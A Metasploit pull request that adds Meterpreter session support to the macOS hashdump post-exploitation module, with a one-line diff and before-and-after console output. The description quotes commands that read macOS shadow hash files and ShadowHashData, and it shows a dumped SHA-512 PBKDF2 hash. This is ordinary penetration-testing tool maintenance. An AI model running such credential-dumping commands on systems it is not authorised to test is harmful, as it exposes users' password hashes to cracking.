### PR TITLE
post/osx/gather/hashdump: Add 'meterpreter' to supported SessionTypes

### DIFF
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Post
           'joev'
         ],
         'Platform'      => [ 'osx' ],
-        'SessionTypes'  => [ 'shell' ]
+        'SessionTypes'  => %w[shell meterpreter]
       ))
     register_options([
       OptRegexp.new('MATCHUSER', [false,


### PR DESCRIPTION
This module works fine with a Meterpreter session on Mac OS X 10.15.7 19H15.

From a cursory glance, the module makes use of no commands which perform/require consecutive interactive operations within a shell process. I see no reason why a Meterpreter session cannot be used. The module has been through some code changes - perhaps there were historical reasons.

```
# grep cmd_exec modules/post/osx/gather/hashdump.rb 
        shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'")
          cmd_exec("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
          cmd_exec("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
        sha1_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c169-216").chomp
        nt_hash   = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c1-32").chomp
        lm_hash   = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c33-64").chomp
    shadow_bytes = cmd_exec("dscl . read /Users/#{user} dsAttrTypeNative:ShadowHashData").gsub(/\s+/, '')
```

# Before

```
msf6 post(osx/gather/hashdump) > rexploit 
[*] Reloading module...

[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Attempting to grab shadow for user user...
[+] SHA-512 PBKDF2:user:$ml$40160$a51b230fe930d2022c725e3525943a7b16f7b375934b16cf0b585474d5c637ca$a7bf66cae1949960293d50262e40a49554d9cf028c6078968f2ed1e1d0125f7ab0bfb0b7356eea16ddb421ef6ce0bde3ec416325336e3ee95bfd0eda30121e9b3d91e24d3e69cf66fcdcb00b891a604e91f362607ba5d4629c6de6057c3971dd798d1b443fc196676a384188447b3ccff48e5916ae691f9c06472506a5db47b0
[*] Credential saved in database.
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Post module execution completed
```

# After

```
msf6 post(osx/gather/hashdump) > rexploit 
[*] Reloading module...

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Attempting to grab shadow for user user...
[+] SHA-512 PBKDF2:user:$ml$40160$a51b230fe930d2022c725e3525943a7b16f7b375934b16cf0b585474d5c637ca$a7bf66cae1949960293d50262e40a49554d9cf028c6078968f2ed1e1d0125f7ab0bfb0b7356eea16ddb421ef6ce0bde3ec416325336e3ee95bfd0eda30121e9b3d91e24d3e69cf66fcdcb00b891a604e91f362607ba5d4629c6de6057c3971dd798d1b443fc196676a384188447b3ccff48e5916ae691f9c06472506a5db47b0
[*] Credential saved in database.
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Post module execution completed
msf6 post(osx/gather/hashdump) > 
```
